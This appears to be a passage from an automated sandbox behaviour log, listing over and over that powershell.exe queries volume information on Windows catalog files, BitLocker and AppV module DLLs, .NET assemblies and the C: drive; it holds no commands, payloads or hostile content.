                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
